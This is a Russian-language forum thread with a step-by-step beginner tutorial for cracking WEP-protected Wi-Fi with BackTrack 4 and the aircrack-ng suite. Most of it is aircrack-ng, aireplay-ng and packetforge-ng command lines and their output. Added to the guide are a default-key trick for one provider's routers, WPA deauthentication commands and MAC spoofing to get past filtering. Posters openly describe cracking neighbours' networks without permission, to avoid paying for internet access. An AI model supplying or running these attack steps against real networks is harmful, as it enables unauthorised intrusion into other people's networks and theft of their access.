Просмотр полной версии : 9 шагов или БТ4 взлом wep для начинающих!
Статейку накатал с опыта много чего не указал примеров нету и не нада - выложу видео ето будет проще
используем БТ4 , статья для тех кто не знает что такое линукс и ниразу с ним не работал не бойтесь
пытаться юзать линукс все очень просто я уверен что у вас получиться , все остальные вопросы можна найти на форуме
я уверен что там есть ответы.
1) airmon-ng start wifi0 Запускаем карту ( wlan0 -ето интерфейс он у каждого компа разный в даном случае wlan0)
еще бывают ath0 mon0 итп.
2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать
определиться с выбором можна просто смотрим какой сигнал сильнее логично , ето дело можна записывать но я
просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга , после выбора канала
останавливаем все окна командой Ctrl+c и делаем такое
airmon-ng stop mon0
airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал)
airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так
airmon-ng start wlan0 9 - пример.
3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш.
В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе
а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства.
4) airodump-ng -c канал сети --bssid мак сети которую ломаем -w capture wlan0 запускаем монитор сети
в етом окне будет мак ломаемой сети. И будут собираться пакеты.
Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
англ текст и вот такое вот :-)
5) 1. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0
2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0
6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
7) aireplay-ng -4 -h (ваш мак) -b (мак который ломаем) wlan0 атака отдельное окно будет задавать вопрос
жмем y
Если атака удалась то вы увидите файл .xor - его нада прописать ниже в первой команде
8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
2. aireplay-ng -2 -r arp-request wlan0
Команда 8 набираем в одном окне
Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 20 000
до 2000000 восновном весь процес в среднем занимает 15- 60 минут ,
если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом .cap
сохраняються на ваш рабочий стол..
9) aircrack-ng -b ломаемый мак capture*.cap
Если пишет что KEY FOUND! - вы нашли пароль ... если в пароле будут все нули ето не верный пароль, продолжайте
собирать пакеты до тех пор пока не найдете пароль ... взлом только шифрование wep
Я думаю у вас получиться 8-)...
БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно.
Более конкретно обсосать aircrack и airdump можна у Elvis000 на ветке (http://forum.antichat.ru/thread50472.html)
.................................................. ...................................
Что б не флудить решил сюда добавить по теме у кого провайдер PTv недавно просек тему у них у всех стоит wep 64 битный , пароль можна узнать очень просто 1. вариант admin логин и пароль 2. вариант МАК адрес ето и есть пароль только пропустите первые две цыфры а все остальное ето пароль , 5 точек проверил все работает ! :-) ...
sergey_allll
03.11.2009, 16:31
bt4 предфинальная версия:
Шаг 1 останавливаем wi-fi карту: ifconfig wlan0 down
шаг 2 меняем мак: macchanger --mac 00:11:11:11:11:11 wlan0
шаг 3 подымаем wi-fi карту: ifconfig wlan0 up
шаг 3 включаем wi-fi карту в режим мониторинга: airmon-ng start wlan0 "получаем виртуальный интерфейс mon0"
шаг 4 запускаем программу сканирования wi-fi сетей: airodump-ng mon0
шаг 5;6:7 и тд. читаем тему от Elvis000 "Документация по airodump-ng, aircrack-ng." там всё популярно написано.
sergey_allll
фак писал что б пасажири которые не умеют летать на линукс не писали в пм а сразу ломали сеть . зачем флудить в теме ?
POS_troi
03.11.2009, 17:10
БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно.
Я тебя засужу за обман.. на моем Зюкселе 56К не скачалось за пол часа ;) (стеб)
не умеют летать на линукс не писали в пм а сразу ломали сеть
этой статьей ты только сильнее превлек внимание к своему ПМ, да и те кто "не умеют летать на линукс" даже с этой статейкой не полетят.
зачем флудить в теме ?
Это не флуд а открытое мнение о том что ты, как таковое выложил перевод офф. доков (просто сжато и на родимом, могучем. за что и маленький респектик тебе).
статья для тех кто не знает что такое линукс и ниразу с ним не работал
извини конечно но твоя статья никак не может быть руководством для начинающих пользоваться ОС Linux и д.р. Unix подобных.
Спасибо за внимание, оформление статьи не сахар =(
POS_troi
я видио выложу тады в ПМ писать не будут 8-)
На пятом пункте постоянно:
Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
------------
все сломать эту точку уже не удастся, верно?
sergey_allll
03.11.2009, 20:11
LuCiFeR если это wep то получить пороль можно.
У вас может не хватает мощности вашей wi-fi карты или на AP стоит фильтрация по MAC, ещё попробуйте пройти Authentication когда на AP появится клиент.
LuCiFeR у тя чипсет не centrino случайно ? если да то просто собирай пакеты , на 25000 можешь пробовать крякать если мало собирай до тех пор пока не напишет что пароль найден
У меня Асус М50Vc. я склоняюсь к тому варианту что сигнал слабоват.
Вообще я занимаюсь этим впервые, до этого никсы вообще не трогал. Но обстоятельства сложились так, что в этом месяце я не могу заплатить за свой инет, по этому ищу альтернативу в соседском вай фае)))
http://img62.imageshack.us/img62/3482/snapshot1hm.png
Кто нить тут видит приличную точку? )))
LuCiFeR
самая первая самая нижняя и кствати одна открытая )
Xcontrol212
04.11.2009, 01:03
Ищи где шифрования WEP, и снифай ломай))
а WPA брутить надо=)
6)aireplay-ng -5 -b (мак который ломаем) -b (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
вот так правильней по моему ><
-----------
не понимаю я, пробовал уже 4 wep защищенных точки, ни разу не удалось... хотя сигнал больше половины... может у меня карточка не подходящая?
ага .. очепятка . исправил!
если карта не подходит то просто собирай пакеты , да оно б писало что вас чипсет не подходит на англ... у тя не сентрино чипсет случйно если нет то не беспокойся )
Robert007
06.11.2009, 17:45
Застрял на третем пункте
ввожу sudo macchanger wlan0
Current MAC: 00:11:11:11:11:11 (Intel Corporation)
ERROR: Can't change MAC: interface up or not permission: Device or resource busy
с чем это связано?
Robert007, ifconfig wlan0 down
Читай код ошибки, устройство занято, следовательно его нужны остановить...
Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата... У меня убунту 9.10 с пакетом аиркрака... быть может у меня драйвер не подходит? Чипсес atheros, дрова стандартные с пакета убунту. Подскажите что делать. Модель ноутбука Asus M50Vc
Robert007
06.11.2009, 18:47
Всё чделал как написано
Пункт 4,6,7 без проблем
Идёт мониторинг и два окна читают пакеты (вроде всё нормально 9000 и 7000 пакетов)
оно само законить читать или нужно выключить в ручную?
на рабочем столе никаких файлов не появилось,они появяться потом?
в мониторинге в #Data стоит значение 6 и не поднимаеться,это нормально?
Застрял на третем пункте
ввожу sudo macchanger wlan0
Current MAC: 00:11:11:11:11:11 (Intel Corporation)
ERROR: Can't change MAC: interface up or not permission: Device or resource busy
с чем это связано?
ни с чем просто мак адрес копируй и делай все дальше .... -)
Всё чделал как написано
Пункт 4,6,7 без проблем
Идёт мониторинг и два окна читают пакеты (вроде всё нормально 9000 и 7000 пакетов)
оно само законить читать или нужно выключить в ручную?
на рабочем столе никаких файлов не появилось,они появяться потом?
в мониторинге в #Data стоит значение 6 и не поднимаеться,это нормально?
дата ето вектора ивы пакеты которые ломаються их нада собирать если молчит то нада ждать пока подымиться хотя б до 25 000
Robert007, ifconfig wlan0 down
Читай код ошибки, устройство занято, следовательно его нужны остановить...
Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата... У меня убунту 9.10 с пакетом аиркрака... быть может у меня драйвер не подходит? Чипсес atheros, дрова стандартные с пакета убунту. Подскажите что делать. Модель ноутбука Asus M50Vc
должно работать. оно если атака не удаеться выкидывает ерор там написано что не конает
Robert007
06.11.2009, 18:57
дата ето вектора ивы пакеты которые ломаються их нада собирать если молчит то нада ждать пока подымиться хотя б до 25 000
Скажи пожалуйста а для чего тогда пункт 6,7?read packets когда нибудь закончиться?
что делать когда наберёться 25000?где искать файл?
извини за нубство,просто я сегодня первый раз увидел убунту и всё это для меня новое
Robert007
06.11.2009, 19:27
Во я дебил!
теща, постоянно одинаковые ошибки... о том что либо фильтрация по мак адрессу, либо сигнал слабый... при любом виде атаки на любое шифрование...
+ ко всему wifizoo ни ловит ни одного пакета с открытых точек..
Я думаю что всё таки проблема в стандартном драйвере ath9k - [phy0], как его заменить пока понять не могу... скачал в менеджере приложений madwifi-drivers и madwifi-tools, но драйвер все равно не сменился, а тулзу запустить не могу...
Не подскажите как в ручную сменить драйвер?
Решил перезапустить процесс,перезагрузил комп и застрял на первом пункте
пишу airmon-ng start wlan0 в ответ Run it as root
пробывал ifconfig wlan0 down в ответ bash: sude: команда не найдена
помогите пожалуйста ,всё работало теперь нет!!!
Или запустить под root'ом, либо в начале каждой команды пиши sudo
Например sudo airmon-ng start wlan0
мдя..
ты бт4 скачай , ато я на нем все делл прошло вс ништяк половина соседей поломаных , обещал зделать видео при перво же возможности повешаю сюда времени ноль ( ...
если мониторинг был уже ништяк ! мак карты тоже определло не должно быть никаких проблем! ты внимательно пишеш 1 ошибка и команда не конает ..я долго игрался )
Пишу все правильно... и дело не в сборке, один фиг убунта)) Так что нету инфы как дрова поставить? )
в раздел линукс подождешь пару дней можт кто ответит :-) ... там трудный вариант чет добиться ) . а еще лучше по гуглить ... я не думаю что ето дрова чет другое .. посстараюсь к вечеру видео зделать
POS_troi
06.11.2009, 19:47
Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата...
не забывайте что точки могут фильтровать по списку разрешенных MAC
ага я тож так поставил ибо впа ткип и мой 18 символьный пароль на долго не хватает :-) ...
да я это понимаю, но дело в том что я свою точку настроил на стандартный wep, сам его сломать не смог ;D
тоже самое с wpa и wpa2
а так-же сделал её открытой, и пытался по снифить через wifizoo, результат нулевой.
Все мои мысли сводятся к драйверу ath9k - [phy0], который работает не правильно, хотя в монитор режим переводит без проблем..
POS_troi, а ты случаем не знаешь как мне его заменить на madwifi? ;)
POS_troi
06.11.2009, 22:01
тут почитай
http://sudouser.com/ustanovka-drajvera-madwifi-dlya-setevogo-adaptera-atheros-5xxx.html
Решил проблему с Wifizoo, удалил убунту 9.10, поставил БТ4))))))))
Ща буду пробовать вепы ломать))
Решил проблему с Wifizoo, удалил убунту 9.10, поставил БТ4))))))))
Ща буду пробовать вепы ломать))
давно пора ! удалять не нада было просто грузился б с диска как и все остальные :-)
Чет пока глухо все попытки поломать WPA кончаются этим:
root@LuCiFeR:~# aireplay-ng -0 1 -a 00:14:6C:94:A8:06 -c 00:17:31:AF:4B:90 wlan0
03:06:21 Waiting for beacon frame (BSSID: 00:14:6C:94:A8:06) on channel 11
03:06:21 Sending 64 directed DeAuth. STMAC: [00:17:31:AF:4B:90] [ 0| 0 ACKs]
root@LuCiFeR:~#
жесть.. ;(
Пысы: Кто нить подскажет как раскладку клавиатуры настроить? Стандартно не переключается, на русский могу перейти только через ctrl+alt+k ;(
теща, а правильно что я 5 - 6 - 7 пункты выполняю одновременно в разных окнах? )
Вот такая штуковина
Failure: the access point does not properly discard frames with an
invalid ICV - try running aireplay-ng in non-authenticated mode instead.
Больше 1200 data собрать не удалось (((
теща, а правильно что я 5 - 6 - 7 пункты выполняю одновременно в разных окнах? )
да 6 7 две разных атаки -4 срабатывает чаще чем -5
ты ж ведь када начинаешь ломать сеть останавливаешь все мониторы равда ? командой контл С ... потом када начинаешь в самом первом окне ты давал команду к примеру
airmon-ng start wlan0 11 где 11 - ломаемый канал
если меняешь сеть визде все остановить и перепрописать или проще для тебя начать заново но мониторы следует останавливать командой стоп перед тем как начинать сканировать другую сеть..
Когда я начинаю аероплей у меня картачка в монитор моде, следит за аеродампом по каналу определенному. больше ни чего вроде не запущено
Мне dhcp в процессах мешал, убил его, буду пробовать)
04:40:39 Sending Authentication Request (Open System) [ACK]
04:40:39 Authentication successful
04:40:39 Sending Association Request [ACK]
04:40:39 Association successful :-) (AID: 1)
Это у меня получается, а вот все остальные атаки не работают....
Пакеты не отсылаются постоянно 0 ARP request and 0 ACKs
в чем может быть проблема? Плохой сигнал?
Мне dhcp в процессах мешал, убил его, буду пробовать)
04:40:39 Sending Authentication Request (Open System) [ACK]
04:40:39 Authentication successful
04:40:39 Sending Association Request [ACK]
04:40:39 Association successful :-) (AID: 1)
Это у меня получается, а вот все остальные атаки не работают....
Пакеты не отсылаются постоянно 0 ARP request and 0 ACKs
в чем может быть проблема? Плохой сигнал?
отот текст с верху обозначает что все ништяк! он должен появиться 2 раза .. потом у тя проценты пойдут! ты увидиш ... если атака удалась то пакеты очень быстро собируться я пока по курил около 50 тыщ уже было ...
вот тебе дока (http://chat.rubiport.com/how_to_crack_wep_with_no_packets.pdf) pdf глянь ... тема такая если атака не прошла ты ее закрываеш .. если вторая не прошла тож закрываеш ... или пытаешься зделать позже смысл в бекон пакетах любым макаром их нада собирать.. -)
sergey_allll
07.11.2009, 16:34
Здраствуй LuCiFeR ты прошёл Association на AP значит твои пакеты она принимает теперь жди клиента , когда полетят data пакеты проведи инжекцию aireplay-ng -3 ... или aireplay-ng -2... ; но до этого нужно обязательно пройти Association тоесть aireplay-ng -1 0 ... ;при проведении инжекции крути свой ноутбук или антенну чтобы скорость приёма data пакетов была максимальной , плохой сигнал скорость 50-100 p/s хороший сигнал 300-400 p/s.После приема 25000 пакетов запускай другую консоль Aircrack-ng с параметром -n 64 если в кносоли где работает airodump-ng количество data пакетов перевалит за 100000-150000 а пороль не будет найден попробуй запустить aircrack-ng с параметром -n 128 и тд.
Удачи тебе, wep точки будут твои!
Что я уже только не пробовал нифига не получается... давайте по порядку, ткните носом что я делаю не так:
1. Конфигурирую точку.. WEP 64bit
2. ifconfig wlan0 up
2. airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Atheros ath9k - [phy0]
(monitor mode enabled on mon0)
airodump-ng mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:1B:11:E2:0E:FB -59 16 0 0 6 54 WEP WEP AsusLan
airodump-ng -c 6 --bssid 02:1B:11:E2:0E:FB -w capture mon0
CH 6 ][ Elapsed: 4 s ][ 2009-11-07 17:44
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:1B:11:E2:0E:FB -44 100 63 0 0 6 54 WEP WEP AsusLan
BSSID STATION PWR Rate Lost Packets Probes
Далее открываю новую консоль.
Пишу
aireplay-ng -1 0 -a 02:1B:11:E2:0E:FB -h 00:24:23:05:2A:31 mon0
Получаю:
17:46:25 Waiting for beacon frame (BSSID: 02:1B:11:E2:0E:FB) on channel 6
17:46:25 Sending Authentication Request (Open System) [ACK]
17:46:25 Authentication successful
17:46:25 Sending Association Request [ACK]
17:46:25 Denied (code 12), wrong ESSID or WPA ?
17:46:28 Sending Authentication Request (Open System) [ACK]
17:46:28 Authentication successful
17:46:28 Sending Association Request [ACK]
17:46:28 Denied (code 12), wrong ESSID or WPA ?
Ето только на моей точке, остальные проходят этот пункт отлично, а вот остальные не очень.
sergey_allll
07.11.2009, 19:05
LuCiFeR 1. Конфигурирую точку.. WEP 64bit
а wep open или psk
Там нету таких настроек, только сессию Guest можно разрешить, собственно это я и сделал...
А вообще так тока на моей точке, на других нормально этот пункт работает... а вот с остальными беда...
Benya-13
08.11.2009, 17:33
спасибо за статью есть два вопроса : после этой команды
5. 2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) mon0
процесс не останавливаеться . так и надо ?
как запустить 8 пункт что то не получаеться 8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
куда записывать получиные Saving plaintext in replay_dec-1108-140631.cap
Saving keystream in replay_dec-1108-140631.xor ? пример если не трудно
сильно не пеняйте новичка :confused:
спасибо за статью есть два вопроса : после этой команды
5. 2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) mon0
процесс не останавливаеться . так и надо ?
как запустить 8 пункт что то не получаеться 8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
куда записывать получиные Saving plaintext in replay_dec-1108-140631.cap
Saving keystream in replay_dec-1108-140631.xor ? пример если не трудно
сильно не пеняйте новичка :confused:
внимательней читай 8 пункт запускаеться тады если у тя атака удалась то есть -4 -5 ...
Benya-13
09.11.2009, 20:15
вроде и делаю как написано только не останавливается команда 5.2 .
только я на хубунте ;) счас докачает бт4 попробую ещё!
всеравно 8 непонятна ! :D
Benya-13
10.11.2009, 05:36
wesside кто нить пробавал если то как прошло ?
вроде и делаю как написано только не останавливается команда 5.2 .
только я на хубунте ;) счас докачает бт4 попробую ещё!
всеравно 8 непонятна ! :D
смари ты запускаешь -1 --- он должен быть в режиме мониторинга обизательно без ошибок аутентификацыя твоей карты если все хорошо пишет ,,ливе пакет,, -- чет типа того один и тот же текст , потом запускаеш -4 -5 --- ето атака одна из них должна сработать если сработало или -4 или -5 ут япоивиццо в окне проценты таблица типа и пакеты будут собираццо с большой скоростю вот и када набереться достаточное количество пакетов окно само остановиться и будет писать что файл .cap .xor найдены ... после етого (если у тя есть больше чем 30 000 пакетов можеш пробовать ломать) -- в ето время пакеты собираються сами ты не останавлииваешь никакой процес ! через каждые 10 000 пакетов юзай команду аиркряка так как там написано .... вобще м то все ..
Benya-13
11.11.2009, 16:24
перевел карту поменял мак потом
аirodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
aireplay-ng mon0 -1 4000 -a 00:14:6C:7E:40:80
крек и все получил ключ на все заняло минут 15 это на другой
а которую первую пробовал там полный ноль не шевелиться хоть тресни
на ночь ставил только 600 пакетов
вокруг меня таких непонятных гнездо у них и имена похожи
в чём дело непойму . пойду бубен куплю ;)
благодорю за внимание разобрался фильтр по маку все про все 1 час 15 мин
Benya-13
11.11.2009, 18:13
Есть пакет хор. , пока не раьотает это
Такой вопрос есть ключ от первой сети айфон подключил без проблем а комп не даёт что за пзц ?)
Есть пакет хор. , пока не раьотает это
Такой вопрос есть ключ от первой сети айфон подключил без проблем а комп не даёт что за пзц ?)
возможно на роутере стоит фильтр по МАК адресам и тебя не пускает!.
Benya-13
23.11.2009, 20:50
так и было , подождал до подключения клиента , записал мак , поменял и я в полете
спасибо очень просто даже для новичка
expert007
28.11.2009, 18:26
Доброго времени суток уважаемые ! Использую bt4 . В гугле уже прописался ,перечитал все , что можно , но никак не пойму алгоритм последовательности команд : начну по порядку как написано в топе .
1. airmo-ng
выскакивает две карты wlan0 и wlan1 (где wlan0 встроеный в лоптоп, а wlan1, это alfa awus036h)
2. airmon-ng start wlan1 запуск карты в режиме мониторинга
3. airodump-ng wlan1 пошел мониторинг списка сетей, ывбрал сеть. Остановил процесс ctrl+c дальше airmon-ng stop wlan1
4. airodump-ng -c канал сети --bssid мак сети -w capture wlan1
пошел процесс сбора beacons и data пакетов. Здесь вопрос : нужно ли останавливать этот процесс после набора нужного кол-ва data пакетов , или пункты 4,5,6 делаются сразу друг за другом ?
И еще впрос в процессе мониторинга сете , в зоне захвата которых я нахожусь попадаются открытые сети без всякого шифрования ENK OPN , там beacons и data пакеты просто летают(за 15 мин beacons 9000 а data 50000), подключаюсь к ней пишет что доступ только локальная сеть! Какую выгоду можно извлечь из этого ? :)
expert007
28.11.2009, 18:28
Sorry забыл за ранее поблагодарить за помощь !
sergey_allll
05.12.2009, 20:40
4. airodump-ng -c канал сети --bssid мак сети -w capture wlan1
пошел процесс сбора beacons и data пакетов. Здесь вопрос : нужно ли останавливать этот процесс после набора нужного кол-ва data пакетов , или пункты 4,5,6 делаются сразу друг за другом ?
Останавливать не нужно пускай airodump-ng набирает пакеты. А мак не ленись меняй сразу не пались.
Остановился на 8 пункте packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно, окна нет. Появляется Wrote packet to: arp-request что это?В чем проблема?
popow_sergei
18.01.2010, 02:08
подскажите , точка открытая . Но пускать не хочет .(вероятно фильтр мака)
вопрос -- как узнать - есть ли на ней клиент , и его мак ???
neznajut
22.01.2010, 03:50
(virtualbox) Backtrack не видит мою карточку
root@bt:~# airmon-ng start wifi0
Interface Chipset Driver
root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
Есть идеи как сие исправить? У меня Edimax 7318USg.
Здрасьте, после длительного перерыва я всё-таки решил занятся беспроводными сетями вновь)) Надеюсь в этот раз будет гораздо больше успеха))
Первым что я сделал это модифицировал свой ноут и прикупил девайсов))
Просверлил дырку в корпусе ноута, припоял конект к вайфайке своей, теперь могу подключать антены стандартного разьёма))
http://cs4419.vkontakte.ru/u815231/104164368/x_1933ca20.jpg
Осталось разобратся с bt4 и начинать ломать всё что найдётся)))
найден ключ, а что дальше с ним делать?
разобрался как в Линуксе подрубаться, а в windows проблема. :(
Люди у меня вот какой вопрос ? Ломал сеть с помощью ВТ 4 и вконце мне высветило вот это: unable to identify the PSK from the dictionary file. Try expanding your passphrase list and double-check the SSID. Sorry it didn t work out
Rastamanka
23.03.2010, 00:11
На восьмом шаге пишет Wrote packet to: arp-request
Всё получилось уперся в такое.
вопро как быть если на точке нет не1 data пакета, а беакон шпарит..пробовал пункты 5.6.7 тишина raed пакеты и всё...что выхода нет ждать пока ктонить подсоедениться?
NikolaiR
25.03.2010, 16:38
что выхода нет ждать пока ктонить подсоедениться?
Выход есть,нужно установить spoonwep2 и тогда не придётся ждать пока кто-то подключится к точке.
подскажите плиз, куда собираются пакеты, где искать этот файл? работаю через Virtualbox через флэшку
Кто поможет не получаю файл xor
после пунктов 6 - 7
идёт прием пакетов, останавливается , спрашивает воспользоваться ли принятыми пакетами , затем вот записывает пакет, отсылает, но не получает ответа.. и так до бесконечности…
Пишу все правильно... и дело не в сборке, один фиг убунта)) Так что нету инфы как дрова поставить? )
подскажите пожалуйста, в чём проблема, запускаю БТ3 через виртульную флешку, проходит мониторинг сетей всё хорошо, но когда начинаю захват пакетов то очень часто не вижу мас клиента(STATION), а вижу мас точки доступа и всю другую инфу, но иногда показывает, но очень редко, антенаUSB на чипсете REALTEK RLT8187 в чем проблема, спасибо заранее!!!!
(virtualbox) Backtrack не видит мою карточку
Есть идеи как сие исправить? У меня Edimax 7318USg.
А ты дрова то ставил? :)
В Ubuntu 9 версии они уже есть.
Достаточно прописать
modprobe rt73usb
modprobe rt2500usb
Если не получилось то вот полная инструкция
http://lookherefirst.wordpress.com/2008/11/02/setting-up-edimax-ew-7318usg-under-linux/
хоть в лепешку раздолбись, не показывает STATION, а без этого не могу дальше посылать пакеты, может кто знает каким образом можно узнать STATION?
мак клиента, вмысле подключенного?
ну да, это после того как я запустил аэродамп на этого клиента
тут почитай
http://sudouser.com/ustanovka-drajvera-madwifi-dlya-setevogo-adaptera-atheros-5xxx.html
а это важно что у меня не Atheros?
важно, потому что у тебя тогда другой драйвер
и где мне его искать? чипсет RTL8187. но вообще я не пойму вот ещё 2 сетки взломал, а сейчас снова не видит, глючит наверное
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot